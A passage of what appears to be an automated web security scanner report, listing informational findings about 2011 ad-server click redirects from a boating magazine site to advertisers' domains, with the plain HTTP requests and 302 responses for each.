<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.125. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:58:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.126. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.127. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.128. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.129. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.130. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.131. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.132. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.133. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.134. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.135. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.136. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.137. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.138. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.139. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
